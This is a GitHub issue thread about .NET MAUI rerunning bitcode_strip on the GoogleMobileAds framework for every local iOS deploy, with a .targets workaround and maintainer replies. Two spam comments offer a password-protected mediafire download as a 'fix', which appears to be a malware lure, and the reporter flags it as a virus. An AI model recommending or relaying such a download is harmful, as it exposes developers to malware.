### ISSUE TITLE
xcrun -find bitcode_strip is running every time I deploy locally to an iPad

### ISSUE THREAD

**Issue by dsancho** [dotnet/maui#24552]
### Description

The problem is that every time I want to debug my application on the iPad, it takes like 30 minutes to run the command xcrun -find bitcode_strip for GoogleMobileAds library. The think is that this library already has been striped and running this command does nothing.

First time I can understand that it is needed to do this process for /XamarinBuildDownloadCache/FAdM-8.13.0/Frameworks/GoogleMobileAdsFramework-Current/GoogleMobileAds.xcframework/ios-arm64_armv7/GoogleMobileAds.framework/GoogleMobileAds but the generated file can be used for subsequent compilations.

I asked GPT and answered to put this in my project 
<PropertyGroup>
    <_StripBitcodeFromFrameworksMasterDependsOnTargets Condition="'$(OS)'=='Windows_NT'">_StripBitcodeFromFrameworksOnWindows</_StripBitcodeFromFrameworksMasterDependsOnTargets>
  </PropertyGroup>

BUT did not work.

### Steps to Reproduce

1. Create a new MAUI iOS project
2. Add any package that references Xamarin.Google.iOS.MobileAds (8.13.0.3). For example, Plugin.MauiMTAdmob
3. You need an Apple developer account, and the device added to a profile for this application.
4. Try to debug in a connected device

### Version with bug

9.0.0-preview.7.24407.4

### Is this a regression from previous behavior?

Not sure, did not test other versions

### Last version that worked well

Unknown/Other

### Affected platforms

iOS

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by dsancho** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

THIS IS A VIRUS! DON'T DOWNLOAD

**Comment by dsancho** [comment]
I have found a workaround that is to comment the following lines from Xamarin.Google.iOS.MobileAds.targets (in the nuget package folder)

<ItemGroup Condition="('$(OutputType)'!='Library' OR '$(IsAppExtension)'=='True')">
    <_FrameworkNamesToStripBitcode Include="GoogleMobileAds" />
  </ItemGroup>

but the ideal is that somehow, visual studio was able know that the file in the XamarinBuildDownloadCache has been already striped.

**Comment by drasticactions** [comment]
@rolfbjarne Would this be an SDK issue?

**Comment by rolfbjarne** [comment]
This is probably a bug in the Xamarin.Google.iOS.MobileAds NuGet, but if you could get an [MSBuild binlog](https://github.com/xamarin/xamarin-macios/wiki/Diagnosis#binary-build-logs) I should be able to confirm what's going on.

**Comment by dsancho** [comment]
This happens to other packages too. It will happen for any package that needs to be striped.

**Comment by QianaJiao** [comment]
Hi, @dsancho I noticed that you also debug to the local iOS device, and using xcframework resource, so it may be the same as https://github.com/dotnet/maui/issues/23829#issuecomment-2328504450

**Comment by rolfbjarne** [comment]
> Hi, @dsancho I noticed that you also debug to the local iOS device, and using xcframework resource, so it may be the same as [#23829 (comment)](https://github.com/dotnet/maui/issues/23829#issuecomment-2328504450)

No, it's not (xcframeworks work fine with Hot Restart, I've created a PR to update the documentation).
